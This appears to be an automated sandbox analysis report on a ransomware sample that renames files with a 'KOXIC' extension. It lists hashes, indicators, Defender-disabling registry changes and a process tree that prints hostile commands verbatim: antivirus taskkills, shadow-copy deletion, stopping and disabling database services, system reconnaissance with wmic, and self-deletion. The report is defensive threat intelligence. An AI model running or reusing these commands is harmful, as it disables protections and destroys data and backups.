Analysis
max time kernel: 4265020s
max time network: 68s
platform: windows10-2004_x64
resource: win10v2004-en-20220113
submitted: 15/01/2022, 12:32
Static task: static1
Behavioral task: behavioral1
  Sample: enc.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: enc.exe
  Resource: win10v2004-en-20220113
General
Target: enc.exe
Size: 156KB
MD5: 14ee62fcc9163509856671400429ad55
SHA1: 7544332b52769ca853d900669ef5e272a2ae1665
SHA256: 699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd
SHA512: 4d71c87be6f6ad7c9f3277b60850cd7136cecfd5f15621d1e56b1897008da8cc742578112ea955f8417c8d4cf13bcfb92e7ceafb34720017b47d81c4d2603bff
Malware Config
Extracted
C:\Documents and Settings\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt
https://tox.chat/download.html
https://github.com/qTox/qTox/releases/download/v1.17.3/setup-qtox-x86_64-release.exe
Signatures

Disables taskbar notifications via registry modification

Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
description | ioc | Process
File opened for modification | C:\Users\Admin\Pictures\TraceConnect.tif.KOXIC_KFKHP | enc.exe
File renamed | C:\Users\Admin\Pictures\MeasureRename.png => C:\Users\Admin\Pictures\MeasureRename.png.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Users\Admin\Pictures\CheckpointJoin.tif.KOXIC_KFKHP | enc.exe
File renamed | C:\Users\Admin\Pictures\TraceConnect.tif => C:\Users\Admin\Pictures\TraceConnect.tif.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Users\Admin\Pictures\RevokeSet.png.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Users\Admin\Pictures\MeasureRename.png.KOXIC_KFKHP | enc.exe
File renamed | C:\Users\Admin\Pictures\CompleteMeasure.png => C:\Users\Admin\Pictures\CompleteMeasure.png.KOXIC_KFKHP | enc.exe
File renamed | C:\Users\Admin\Pictures\CheckpointJoin.tif => C:\Users\Admin\Pictures\CheckpointJoin.tif.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Users\Admin\Pictures\CompleteMeasure.png.KOXIC_KFKHP | enc.exe
File renamed | C:\Users\Admin\Pictures\RevokeSet.png => C:\Users\Admin\Pictures\RevokeSet.png.KOXIC_KFKHP | enc.exe

Windows security modification
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\DisableBlockAtFirstSeen = "1" | enc.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\LocalSettingOverrideSpynetReporting = "0" | enc.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "2" | enc.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration | enc.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\UX Configuration\NotificationSuppress = "1" | enc.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | enc.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtectione = "0" | enc.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet | enc.exe
Drops file in Program Files directory 64 IoCs
description | ioc | Process
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\ui-strings.js.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover.png.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_sv.properties.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar.KOXIC_KFKHP | enc.exe
File created | C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000050\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Trial-ppd.xrm-ms.KOXIC_KFKHP | enc.exe
File created | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-white\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\ui-strings.js.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\checkmark-2x.png.KOXIC_KFKHP | enc.exe
File created | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File created | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\AddressBook2x.png.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected]_KFKHP | enc.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-140.png.KOXIC_KFKHP | enc.exe
File created | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Voices\beeps\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File opened for modification | C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\In.Tests.ps1.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root.xrm-ms.KOXIC_KFKHP | enc.exe
File created | C:\Program Files (x86)\Common Files\System\en-US\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AXIS\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File created | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\Classic\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File created | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_~_kzf8qxf38zg5c\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusEDUR_SubTrial-pl.xrm-ms.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-ul-oob.xrm-ms.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ul-oob.xrm-ms.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Microsoft Office\root\rsod\osmux.x-none.msi.16.x-none.tree.dat.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x.KOXIC_KFKHP | enc.exe
File created | C:\Program Files\WindowsPowerShell\Configuration\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange.xml.KOXIC_KFKHP | enc.exe
File created | C:\Program Files\Microsoft Office\PackageManifests\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_2019.716.2313.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\selector.js.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon.png.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\jawt.lib.KOXIC_KFKHP | enc.exe
File created | C:\Program Files\Windows Media Player\en-US\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File created | C:\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.27629.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-pl.xrm-ms.KOXIC_KFKHP | enc.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File opened for modification | C:\Program Files (x86)\Common Files\System\ado\ja-JP\msader15.dll.mui.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sv-se\ui-strings.js.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunpkcs11.jar.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\sdxs.xml.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui.KOXIC_KFKHP | enc.exe
File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\microsoft.system.package.metadata\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File opened for modification | C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Coverage.ps1.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-100.png.KOXIC_KFKHP | enc.exe
File created | C:\Program Files\Windows NT\Accessories\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTest-pl.xrm-ms.KOXIC_KFKHP | enc.exe
File created | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_link_18.svg.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\ui-strings.js.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\.lastModified.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat | enc.exe
File created | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_selected_18.svg.KOXIC_KFKHP | enc.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt | enc.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\adobe-old-logo.jpg.KOXIC_KFKHP | enc.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\org-openide-util.jar.KOXIC_KFKHP | enc.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | MusNotification.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | MusNotification.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid | Process
3924 | ipconfig.exe

Kills process with taskkill 1 IoCs
pid | Process
2060 | taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs
pid | Process
2916 | notepad.exe

Runs ping.exe 1 TTPs 1 IoCs
pid | Process
1920 | PING.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
3608 | enc.exe (the same row is listed 64 times in the report)
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2060 | taskkill.exe
Token: SeBackupPrivilege | 3608 | enc.exe
Token: SeRestorePrivilege | 3608 | enc.exe
Token: SeManageVolumePrivilege | 3608 | enc.exe
Token: SeTakeOwnershipPrivilege | 3608 | enc.exe
Token: SeIncreaseQuotaPrivilege | 2084 | WMIC.exe
Token: SeSecurityPrivilege | 2084 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 2084 | WMIC.exe
Token: SeLoadDriverPrivilege | 2084 | WMIC.exe
Token: SeSystemProfilePrivilege | 2084 | WMIC.exe
Token: SeSystemtimePrivilege | 2084 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 2084 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 2084 | WMIC.exe
Token: SeCreatePagefilePrivilege | 2084 | WMIC.exe
Token: SeBackupPrivilege | 2084 | WMIC.exe
Token: SeRestorePrivilege | 2084 | WMIC.exe
Token: SeShutdownPrivilege | 2084 | WMIC.exe
Token: SeDebugPrivilege | 2084 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 2084 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 2084 | WMIC.exe
Token: SeUndockPrivilege | 2084 | WMIC.exe
Token: SeManageVolumePrivilege | 2084 | WMIC.exe
Token: 33 | 2084 | WMIC.exe
Token: 34 | 2084 | WMIC.exe
Token: 35 | 2084 | WMIC.exe
Token: 36 | 2084 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 2084 | WMIC.exe
Token: SeSecurityPrivilege | 2084 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 2084 | WMIC.exe
Token: SeLoadDriverPrivilege | 2084 | WMIC.exe
Token: SeSystemProfilePrivilege | 2084 | WMIC.exe
Token: SeSystemtimePrivilege | 2084 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 2084 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 2084 | WMIC.exe
Token: SeCreatePagefilePrivilege | 2084 | WMIC.exe
Token: SeBackupPrivilege | 2084 | WMIC.exe
Token: SeRestorePrivilege | 2084 | WMIC.exe
Token: SeShutdownPrivilege | 2084 | WMIC.exe
Token: SeDebugPrivilege | 2084 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 2084 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 2084 | WMIC.exe
Token: SeUndockPrivilege | 2084 | WMIC.exe
Token: SeManageVolumePrivilege | 2084 | WMIC.exe
Token: 33 | 2084 | WMIC.exe
Token: 34 | 2084 | WMIC.exe
Token: 35 | 2084 | WMIC.exe
Token: 36 | 2084 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 1544 | WMIC.exe
Token: SeSecurityPrivilege | 1544 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1544 | WMIC.exe
Token: SeLoadDriverPrivilege | 1544 | WMIC.exe
Token: SeSystemProfilePrivilege | 1544 | WMIC.exe
Token: SeSystemtimePrivilege | 1544 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 1544 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 1544 | WMIC.exe
Token: SeCreatePagefilePrivilege | 1544 | WMIC.exe
Token: SeBackupPrivilege | 1544 | WMIC.exe
Token: SeRestorePrivilege | 1544 | WMIC.exe
Token: SeShutdownPrivilege | 1544 | WMIC.exe
Token: SeDebugPrivilege | 1544 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1544 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 1544 | WMIC.exe
Token: SeUndockPrivilege | 1544 | WMIC.exe
Token: SeManageVolumePrivilege | 1544 | WMIC.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 3608 wrote to memory of 2220 | 3608 | enc.exe | 54
PID 3608 wrote to memory of 2220 | 3608 | enc.exe | 54
PID 3608 wrote to memory of 2220 | 3608 | enc.exe | 54
PID 2220 wrote to memory of 2060 | 2220 | cmd.exe | 56
PID 2220 wrote to memory of 2060 | 2220 | cmd.exe | 56
PID 2220 wrote to memory of 2060 | 2220 | cmd.exe | 56
PID 3608 wrote to memory of 3276 | 3608 | enc.exe | 57
PID 3608 wrote to memory of 3276 | 3608 | enc.exe | 57
PID 3608 wrote to memory of 3276 | 3608 | enc.exe | 57
PID 3608 wrote to memory of 3408 | 3608 | enc.exe | 59
PID 3608 wrote to memory of 3408 | 3608 | enc.exe | 59
PID 3608 wrote to memory of 3408 | 3608 | enc.exe | 59
PID 3608 wrote to memory of 3228 | 3608 | enc.exe | 61
PID 3608 wrote to memory of 3228 | 3608 | enc.exe | 61
PID 3608 wrote to memory of 3228 | 3608 | enc.exe | 61
PID 3228 wrote to memory of 2084 | 3228 | cmd.exe | 63
PID 3228 wrote to memory of 2084 | 3228 | cmd.exe | 63
PID 3228 wrote to memory of 2084 | 3228 | cmd.exe | 63
PID 3608 wrote to memory of 2256 | 3608 | enc.exe | 64
PID 3608 wrote to memory of 2256 | 3608 | enc.exe | 64
PID 3608 wrote to memory of 2256 | 3608 | enc.exe | 64
PID 3608 wrote to memory of 780 | 3608 | enc.exe | 66
PID 3608 wrote to memory of 780 | 3608 | enc.exe | 66
PID 3608 wrote to memory of 780 | 3608 | enc.exe | 66
PID 780 wrote to memory of 1544 | 780 | cmd.exe | 68
PID 780 wrote to memory of 1544 | 780 | cmd.exe | 68
PID 780 wrote to memory of 1544 | 780 | cmd.exe | 68
PID 3608 wrote to memory of 1308 | 3608 | enc.exe | 69
PID 3608 wrote to memory of 1308 | 3608 | enc.exe | 69
PID 3608 wrote to memory of 1308 | 3608 | enc.exe | 69
PID 3608 wrote to memory of 3460 | 3608 | enc.exe | 71
PID 3608 wrote to memory of 3460 | 3608 | enc.exe | 71
PID 3608 wrote to memory of 3460 | 3608 | enc.exe | 71
PID 3460 wrote to memory of 3588 | 3460 | cmd.exe | 73
PID 3460 wrote to memory of 3588 | 3460 | cmd.exe | 73
PID 3460 wrote to memory of 3588 | 3460 | cmd.exe | 73
PID 3608 wrote to memory of 3280 | 3608 | enc.exe | 74
PID 3608 wrote to memory of 3280 | 3608 | enc.exe | 74
PID 3608 wrote to memory of 3280 | 3608 | enc.exe | 74
PID 3608 wrote to memory of 3872 | 3608 | enc.exe | 76
PID 3608 wrote to memory of 3872 | 3608 | enc.exe | 76
PID 3608 wrote to memory of 3872 | 3608 | enc.exe | 76
PID 3872 wrote to memory of 2972 | 3872 | cmd.exe | 78
PID 3872 wrote to memory of 2972 | 3872 | cmd.exe | 78
PID 3872 wrote to memory of 2972 | 3872 | cmd.exe | 78
PID 3608 wrote to memory of 3200 | 3608 | enc.exe | 79
PID 3608 wrote to memory of 3200 | 3608 | enc.exe | 79
PID 3608 wrote to memory of 3200 | 3608 | enc.exe | 79
PID 3608 wrote to memory of 768 | 3608 | enc.exe | 81
PID 3608 wrote to memory of 768 | 3608 | enc.exe | 81
PID 3608 wrote to memory of 768 | 3608 | enc.exe | 81
PID 768 wrote to memory of 2976 | 768 | cmd.exe | 83
PID 768 wrote to memory of 2976 | 768 | cmd.exe | 83
PID 768 wrote to memory of 2976 | 768 | cmd.exe | 83
PID 3608 wrote to memory of 2244 | 3608 | enc.exe | 85
PID 3608 wrote to memory of 2244 | 3608 | enc.exe | 85
PID 3608 wrote to memory of 2244 | 3608 | enc.exe | 85
PID 3608 wrote to memory of 1372 | 3608 | enc.exe | 87
PID 3608 wrote to memory of 1372 | 3608 | enc.exe | 87
PID 3608 wrote to memory of 1372 | 3608 | enc.exe | 87
PID 1372 wrote to memory of 1960 | 1372 | cmd.exe | 89
PID 1372 wrote to memory of 1960 | 1372 | cmd.exe | 89
PID 1372 wrote to memory of 1960 | 1372 | cmd.exe | 89
PID 3608 wrote to memory of 3344 | 3608 | enc.exe | 90
Processes

C:\Users\Admin\AppData\Local\Temp\enc.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\enc.exe"
  - Modifies extensions of user files
  - Windows security modification
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 3608

  C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c taskkill /F /IM MSASCuiL.exe taskkill /F /IM MSMpeng.exe taskkill /F /IM msseces.exe
    - Suspicious use of WriteProcessMemory
    PID: 2220

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /F /IM MSASCuiL.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 2060

  C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled
    PID: 3276

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "echo OS INFO: > %TEMP%\DHPMDAPUF"
    PID: 3408

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "wmic OS get Caption,CSDVersion,OSArchitecture,Version >> %TEMP%\DHPMDAPUF"
    - Suspicious use of WriteProcessMemory
    PID: 3228

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      Command line: wmic OS get Caption,CSDVersion,OSArchitecture,Version
      - Suspicious use of AdjustPrivilegeToken
      PID: 2084

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "echo BIOS INFO: >> %TEMP%\DHPMDAPUF"
    PID: 2256

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version >> %TEMP%\DHPMDAPUF"
    - Suspicious use of WriteProcessMemory
    PID: 780

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      Command line: wmic BIOS get Manufacturer, Name, SMBIOSBIOSVersion, Version
      - Suspicious use of AdjustPrivilegeToken
      PID: 1544

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "echo CPU INFO: >> %TEMP%\DHPMDAPUF"
    PID: 1308

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors >> %TEMP%\DHPMDAPUF"
    - Suspicious use of WriteProcessMemory
    PID: 3460

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      Command line: wmic CPU get Name, NumberOfCores, NumberOfLogicalProcessors
      PID: 3588

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "echo MEMPHYSICAL INFO: >> %TEMP%\DHPMDAPUF"
    PID: 3280

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "wmic MEMPHYSICAL get MaxCapacity >> %TEMP%\DHPMDAPUF"
    - Suspicious use of WriteProcessMemory
    PID: 3872

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      Command line: wmic MEMPHYSICAL get MaxCapacity
      PID: 2972

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "echo MEMORYCHIP: INFO >> %TEMP%\DHPMDAPUF"
    PID: 3200

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag >> %TEMP%\DHPMDAPUF"
    - Suspicious use of WriteProcessMemory
    PID: 768

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      Command line: wmic MEMORYCHIP get Capacity, DeviceLocator, PartNumber, Tag
      PID: 2976

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "echo NIC INFO: >> %TEMP%\DHPMDAPUF"
    PID: 2244

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "wmic NIC get Description, MACAddress, NetEnabled, Speed >> %TEMP%\DHPMDAPUF"
    - Suspicious use of WriteProcessMemory
    PID: 1372

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      Command line: wmic NIC get Description, MACAddress, NetEnabled, Speed
      PID: 1960

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "echo DISKDRIVE INFO: >> %TEMP%\DHPMDAPUF"
    PID: 3344

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "wmic DISKDRIVE get InterfaceType, Name, Size, Status >> %TEMP%\DHPMDAPUF"
    PID: 4020

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      Command line: wmic DISKDRIVE get InterfaceType, Name, Size, Status
      PID: 3364

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "echo USERACCOUNT INFO: >> %TEMP%\DHPMDAPUF"
    PID: 2196

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "wmic USERACCOUNT get Caption, Name, PasswordRequired, Status >> %TEMP%\DHPMDAPUF"
    PID: 2256

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      Command line: wmic USERACCOUNT get Caption, Name, PasswordRequired, Status
      PID: 1544

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "echo IPCONFIG: >> %TEMP%\DHPMDAPUF"
    PID: 3868

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "ipconfig >> %TEMP%\DHPMDAPUF"
    PID: 3908

    C:\Windows\SysWOW64\ipconfig.exe
      Command line: ipconfig
      - Gathers network information
      PID: 3924

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c "echo DATABASES FILES: >> %TEMP%\DHPMDAPUF"
    PID: 1656

  C:\Windows\SysWOW64\notepad.exe
    Command line: notepad.exe C:\Users\Admin\AppData\Local\Temp\WANNA_RECOVER_KOXIC_FILEZ_KFKHP.txt
    - Opens file in notepad (likely ransom note)
    PID: 2916

  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\enc.exe"
    PID: 2504

    C:\Windows\SysWOW64\PING.EXE
      Command line: ping 1.1.1.1 -n 1 -w 3000
      - Runs ping.exe
      PID: 1920

C:\Windows\system32\MusNotification.exe
